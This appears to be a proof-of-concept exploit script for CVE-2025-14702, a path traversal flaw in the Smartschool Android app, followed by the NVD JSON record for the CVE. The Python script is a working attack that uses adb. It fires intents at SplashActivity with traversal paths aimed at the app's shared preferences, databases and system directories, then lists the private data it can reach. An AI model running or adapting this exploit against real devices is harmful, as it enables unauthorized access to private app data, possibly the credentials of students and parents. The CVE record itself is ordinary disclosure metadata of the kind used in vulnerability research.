CVE-2025-14702

# CVE-2025-14702 PoC - Path Traversal in Smartschool App # Target: Smartbit CommV Smartschool App <= 10.4.4 # Component: be.smartschool.mobile.SplashActivity import os import subprocess def check_vulnerable(): """ Check if Smartschool App is installed and potentially vulnerable """ package_name = "be.smartschool.mobile" # Check if app is installed result = subprocess.run( ["adb", "shell", "pm", "list", "packages", package_name], capture_output=True, text=True ) if package_name in result.stdout: print(f"[+] {package_name} is installed") return True else: print(f"[-] {package_name} is not installed") return False def exploit_path_traversal(): """ Exploit path traversal via Intent with malicious path """ # Malicious path using path traversal sequences malicious_paths = [ "../../data/data/be.smartschool.mobile/shared_prefs/", "../../data/data/be.smartschool.mobile/databases/", "../../data/data/be.smartschool.mobile/files/", "../../sdcard/Android/data/be.smartschool.mobile/", "../../../etc/", "../../../../system/etc/" ] for path in malicious_paths: print(f"[*] Attempting path: {path}") # Construct intent to trigger SplashActivity with malicious path intent_cmd = ( f"am start -n be.smartschool.mobile/.SplashActivity " f"-d file://{path}" ) subprocess.run(["adb", "shell", intent_cmd], capture_output=True) def verify_exposed_files(): """ Verify if sensitive files are accessible """ sensitive_locations = [ "/data/data/be.smartschool.mobile/shared_prefs/", "/data/data/be.smartschool.mobile/databases/", "/storage/emulated/0/Android/data/be.smartschool.mobile/" ] for location in sensitive_locations: result = subprocess.run( ["adb", "shell", "run-as", "be.smartschool.mobile", "ls", "-la", location], capture_output=True, text=True ) if result.returncode == 0: print(f"[+] Accessible: {location}") print(result.stdout) else: print(f"[-] Not accessible or not found: {location}") if __name__ == "__main__": print("CVE-2025-14702 Path Traversal PoC") print("=" * 50) if check_vulnerable(): print("\n[*] Testing path traversal vulnerability...") exploit_path_traversal() print("\n[*] Verifying exposed files...") verify_exposed_files()

{"cve": {"id": "CVE-2025-14702", "sourceIdentifier": "[email protected]", "published": "2025-12-15T04:15:36.760", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Smartbit CommV Smartschool App up to 10.4.4. Impacted is an unknown function of the component be.smartschool.mobile.SplashActivity. Executing manipulation can lead to path traversal. The attack requires local access. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 3.2, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/4", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336419", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336419", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.706220", "source": "[email protected]"}]}}